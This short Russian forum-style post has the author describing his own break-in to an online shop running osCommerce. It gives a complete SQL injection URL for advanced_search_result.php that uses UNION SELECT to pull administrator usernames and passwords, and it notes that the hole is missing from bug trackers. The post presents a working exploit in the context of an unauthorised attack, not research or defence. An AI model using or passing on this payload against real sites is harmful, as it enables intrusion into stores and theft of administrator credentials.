Недавно ломал один шоп, даже не посмотрел, что он на osCommerce, нашёл инъекцию:

advanced_search_result.php?inc_subcat=1&keywords=% 20&categories_id=-1+union+select+1,concat_ws(%27;%27,user_name,user_ password)+from+administrators+limit+1,1--

Она почему-то в багтреках не упоминается, но в отчётах о патчах есть